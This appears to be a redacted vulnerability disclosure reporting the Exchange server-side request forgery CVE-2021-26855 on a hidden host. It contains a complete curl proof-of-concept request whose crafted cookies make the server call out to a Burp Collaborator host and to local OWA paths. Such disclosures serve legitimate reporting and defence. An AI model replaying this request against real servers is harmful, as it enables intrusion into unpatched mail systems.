EPSS
Percentile
100.0%
Description:CVE-2021-26855 exists on███████ resulting** in SSRF
https://vulners.com/cve/CVE-2021-26855
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
Server Side Request Frogery
███████
CVE-2021-26855
curl -i -s -k -X $'GET' \
-H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \
$'https://████████/owa/auth/x.js'
OUTPUT:
██████████
EPSS
Percentile
100.0%